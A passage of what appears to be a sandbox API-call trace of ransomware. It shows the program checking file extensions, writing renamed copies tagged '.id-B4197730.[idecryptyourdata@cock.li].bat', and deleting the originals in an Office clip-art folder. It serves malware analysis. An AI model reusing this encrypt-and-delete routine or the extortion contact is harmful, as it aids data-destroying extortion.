lpString2=".GIF") returned -1 [0061.381] lstrlenW (lpString=".docx") returned 5 [0061.381] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0061.381] lstrlenW (lpString=".pdf") returned 4 [0061.381] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0061.381] lstrlenW (lpString=".xls") returned 4 [0061.381] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0061.381] lstrlenW (lpString=".xlsx") returned 5 [0061.381] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0061.381] lstrlenW (lpString=".ppt") returned 4 [0061.381] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0061.381] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00135_.GIF") returned 68 [0061.381] lstrlenW (lpString=".zip") returned 4 [0061.381] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0061.381] lstrlenW (lpString=".rar") returned 4 [0061.381] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0061.381] lstrlenW (lpString=".bz2") returned 4 [0061.381] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0061.381] lstrlenW (lpString=".7z") returned 3 [0061.381] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0061.381] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00135_.GIF") returned 68 [0061.382] lstrlenW (lpString=".dbf") returned 4 [0061.382] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0061.382] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00135_.GIF") returned 68 [0061.382] lstrlenW (lpString=".1cd") returned 4 [0061.382] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0061.382] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00135_.GIF") returned 68 [0061.382] lstrlenW (lpString=".jpg") returned 4 [0061.382] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0061.382] lstrcmpiW (lpString1=".GIF", lpString2=".bat") returned 1 [0061.382] lstrlenW (lpString="AG00154_.GIF") returned 12 [0061.382] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00154_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00154_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0061.382] GetFileSizeEx (in: hFile=0x340, lpFileSize=0x2d0ff14 | out: lpFileSize=0x2d0ff14*=5315) returned 1 [0061.382] CloseHandle (hObject=0x340) returned 1 [0061.383] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00154_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00154_.gif")) returned 0x220 [0061.383] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00154_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00154_.gif.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0061.383] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00154_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00154_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0061.383] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0061.383] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0061.383] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00154_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00154_.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0061.383] GetLastError () returned 0x0 [0061.383] ReadFile (in: hFile=0x340, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x14c3, lpOverlapped=0x0) returned 1 [0061.447] WriteFile (in: hFile=0x370, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x14d0, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x14d0, lpOverlapped=0x0) returned 1 [0061.448] ReadFile (in: hFile=0x340, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0061.448] WriteFile (in: hFile=0x370, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xec, lpOverlapped=0x0) returned 1 [0061.448] SetEndOfFile (hFile=0x370) returned 1 [0061.452] CloseHandle (hObject=0x370) returned 1 [0061.454] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0061.454] SetEndOfFile (hFile=0x340) returned 1 [0061.456] CloseHandle (hObject=0x340) returned 1 [0061.457] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00154_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0061.458] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00154_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00154_.gif")) returned 1 [0061.458] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00154_.GIF") returned 68 [0061.458] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00154_.GIF") returned 68 [0061.458] lstrlenW (lpString=".doc") returned 4 [0061.458] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0061.458] lstrlenW (lpString=".docx") returned 5 [0061.458] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0061.458] lstrlenW (lpString=".pdf") returned 4 [0061.458] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0061.459] lstrlenW (lpString=".xls") returned 4 [0061.459] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0061.459] lstrlenW (lpString=".xlsx") returned 5 [0061.459] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0061.459] lstrlenW (lpString=".ppt") returned 4 [0061.459] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0061.459] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00154_.GIF") returned 68 [0061.459] lstrlenW (lpString=".zip") returned 4 [0061.459] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0061.459] lstrlenW (lpString=".rar") returned 4 [0061.459] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0061.459] lstrlenW (lpString=".bz2") returned 4 [0061.459] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0061.459] lstrlenW (lpString=".7z") returned 3 [0061.459] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0061.459] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00154_.GIF") returned 68 [0061.459] lstrlenW (lpString=".dbf") returned 4 [0061.459] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0061.459] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00154_.GIF") returned 68 [0061.459] lstrlenW (lpString=".1cd") returned 4 [0061.459] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0061.459] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00154_.GIF") returned 68 [0061.459] lstrlenW (lpString=".jpg") returned 4 [0061.459] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0061.459] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00154_.GIF") returned 68 [0061.459] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00154_.GIF") returned 68 [0061.459] lstrlenW (lpString=".doc") returned 4 [0061.459] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0061.460] lstrlenW (lpString=".docx") returned 5 [0061.460] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0061.460] lstrlenW (lpString=".pdf") returned 4 [0061.460] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0061.460] lstrlenW (lpString=".xls") returned 4 [0061.460] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0061.460] lstrlenW (lpString=".xlsx") returned 5 [0061.460] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0061.460] lstrlenW (lpString=".ppt") returned 4 [0061.460] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0061.460] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00154_.GIF") returned 68 [0061.460] lstrlenW (lpString=".zip") returned 4 [0061.460] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0061.460] lstrlenW (lpString=".rar") returned 4 [0061.460] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0061.460] lstrlenW (lpString=".bz2") returned 4 [0061.460] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0061.460] lstrlenW (lpString=".7z") returned 3 [0061.460] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0061.460] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00154_.GIF") returned 68 [0061.460] lstrlenW (lpString=".dbf") returned 4 [0061.460] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0061.460] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00154_.GIF") returned 68 [0061.460] lstrlenW (lpString=".1cd") returned 4 [0061.460] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0061.460] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00154_.GIF") returned 68 [0061.460] lstrlenW (lpString=".jpg") returned 4 [0061.460] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0061.461] lstrcmpiW (lpString1=".GIF", lpString2=".bat") returned 1 [0061.461] lstrlenW (lpString="AG00160_.GIF") returned 12 [0061.461] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00160_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00160_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0061.461] GetFileSizeEx (in: hFile=0x368, lpFileSize=0x2d0ff14 | out: lpFileSize=0x2d0ff14*=1146) returned 1 [0061.461] CloseHandle (hObject=0x368) returned 1 [0061.461] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00160_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00160_.gif")) returned 0x220 [0061.461] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00160_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00160_.gif.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0061.461] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00160_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00160_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0061.461] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0061.462] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0061.462] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00160_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00160_.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0061.462] GetLastError () returned 0x0 [0061.462] ReadFile (in: hFile=0x368, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x47a, lpOverlapped=0x0) returned 1 [0061.463] WriteFile (in: hFile=0x344, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x480, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x480, lpOverlapped=0x0) returned 1 [0061.464] ReadFile (in: hFile=0x368, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0061.464] WriteFile (in: hFile=0x344, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xec, lpOverlapped=0x0) returned 1 [0061.464] SetEndOfFile (hFile=0x344) returned 1 [0061.465] CloseHandle (hObject=0x344) returned 1 [0061.465] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0061.465] SetEndOfFile (hFile=0x368) returned 1 [0061.466] CloseHandle (hObject=0x368) returned 1 [0061.466] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00160_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0061.466] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00160_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00160_.gif")) returned 1 [0061.467] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00160_.GIF") returned 68 [0061.467] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00160_.GIF") returned 68 [0061.467] lstrlenW (lpString=".doc") returned 4 [0061.467] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0061.467] lstrlenW (lpString=".docx") returned 5 [0061.467] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0061.467] lstrlenW (lpString=".pdf") returned 4 [0061.467] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0061.467] lstrlenW (lpString=".xls") returned 4 [0061.467] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0061.467] lstrlenW (lpString=".xlsx") returned 5 [0061.467] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0061.467] lstrlenW (lpString=".ppt") returned 4 [0061.467] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0061.467] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00160_.GIF") returned 68 [0061.467] lstrlenW (lpString=".zip") returned 4 [0061.467] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0061.467] lstrlenW (lpString=".rar") returned 4 [0061.467] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0061.467] lstrlenW (lpString=".bz2") returned 4 [0061.467] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0061.467] lstrlenW (lpString=".7z") returned 3 [0061.467] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0061.467] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00160_.GIF") returned 68 [0061.467] lstrlenW (lpString=".dbf") returned 4 [0061.467] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0061.467] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00160_.GIF") returned 68 [0061.467] lstrlenW (lpString=".1cd") returned 4 [0061.467] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0061.467] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00160_.GIF") returned 68 [0061.467] lstrlenW (lpString=".jpg") returned 4 [0061.467] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0061.468] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00160_.GIF") returned 68 [0061.468] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00160_.GIF") returned 68 [0061.468] lstrlenW (lpString=".doc") returned 4 [0061.468] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0061.468] lstrlenW (lpString=".docx") returned 5 [0061.468] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0061.468] lstrlenW (lpString=".pdf") returned 4 [0061.468] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0061.468] lstrlenW (lpString=".xls") returned 4 [0061.468] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0061.468] lstrlenW (lpString=".xlsx") returned 5 [0061.468] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0061.468] lstrlenW (lpString=".ppt") returned 4 [0061.468] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0061.468] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00160_.GIF") returned 68 [0061.468] lstrlenW (lpString=".zip") returned 4 [0061.468] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0061.468] lstrlenW (lpString=".rar") returned 4 [0061.468] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0061.468] lstrlenW (lpString=".bz2") returned 4 [0061.468] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0061.468] lstrlenW (lpString=".7z") returned 3 [0061.468] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0061.468] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00160_.GIF") returned 68 [0061.468] lstrlenW (lpString=".dbf") returned 4 [0061.468] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0061.468] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00160_.GIF") returned 68 [0061.468] lstrlenW (lpString=".1cd") returned 4 [0061.468] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0061.468] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00160_.GIF") returned 68 [0061.468] lstrlenW (lpString=".jpg") returned 4 [0061.468] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0061.468] lstrcmpiW (lpString1=".GIF", lpString2=".bat") returned 1 [0061.469] lstrlenW (lpString="AG00161_.GIF") returned 12 [0061.469] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00161_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00161_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0061.469] GetFileSizeEx (in: hFile=0x368, lpFileSize=0x2d0ff14 | out: lpFileSize=0x2d0ff14*=7583) returned 1 [0061.469] CloseHandle (hObject=0x368) returned 1 [0061.469] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00161_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00161_.gif")) returned 0x220 [0061.469] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00161_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00161_.gif.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0061.469] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00161_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00161_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0061.470] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0061.470] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0061.470] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00161_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00161_.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0061.470] GetLastError () returned 0x0 [0061.470] ReadFile (in: hFile=0x368, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x1d9f, lpOverlapped=0x0) returned 1 [0061.498] WriteFile (in: hFile=0x344, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x1da0, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x1da0, lpOverlapped=0x0) returned 1 [0061.499] ReadFile (in: hFile=0x368, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0061.499] WriteFile (in: hFile=0x344, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xec, lpOverlapped=0x0) returned 1 [0061.499] SetEndOfFile (hFile=0x344) returned 1 [0061.499] CloseHandle (hObject=0x344) returned 1 [0061.501] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0061.501] SetEndOfFile (hFile=0x368) returned 1 [0061.503] CloseHandle (hObject=0x368) returned 1 [0061.503] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00161_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0061.503] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00161_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00161_.gif")) returned 1 [0061.503] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00161_.GIF") returned 68 [0061.503] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00161_.GIF") returned 68 [0061.503] lstrlenW (lpString=".doc") returned 4 [0061.503] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0061.503] lstrlenW (lpString=".docx") returned 5 [0061.503] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0061.504] lstrlenW (lpString=".pdf") returned 4 [0061.504] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0061.504] lstrlenW (lpString=".xls") returned 4 [0061.504] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0061.504] lstrlenW (lpString=".xlsx") returned 5 [0061.504] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0061.504] lstrlenW (lpString=".ppt") returned 4 [0061.504] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0061.504] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00161_.GIF") returned 68 [0061.504] lstrlenW (lpString=".zip") returned 4 [0061.504] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0061.504] lstrlenW (lpString=".rar") returned 4 [0061.504] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0061.504] lstrlenW (lpString=".bz2") returned 4 [0061.504] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0061.504] lstrlenW (lpString=".7z") returned 3 [0061.504] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0061.504] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00161_.GIF") returned 68 [0061.504] lstrlenW (lpString=".dbf") returned 4 [0061.504] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0061.504] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00161_.GIF") returned 68 [0061.504] lstrlenW (lpString=".1cd") returned 4 [0061.504] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0061.504] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00161_.GIF") returned 68 [0061.504] lstrlenW (lpString=".jpg") returned 4 [0061.504] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0061.505] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00161_.GIF") returned 68 [0061.505] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00161_.GIF") returned 68 [0061.505] lstrlenW (lpString=".doc") returned 4 [0061.505] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0061.505] lstrlenW (lpString=".docx") returned 5 [0061.505] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0061.505] lstrlenW (lpString=".pdf") returned 4 [0061.505] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0061.505] lstrlenW (lpString=".xls") returned 4 [0061.505] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0061.505] 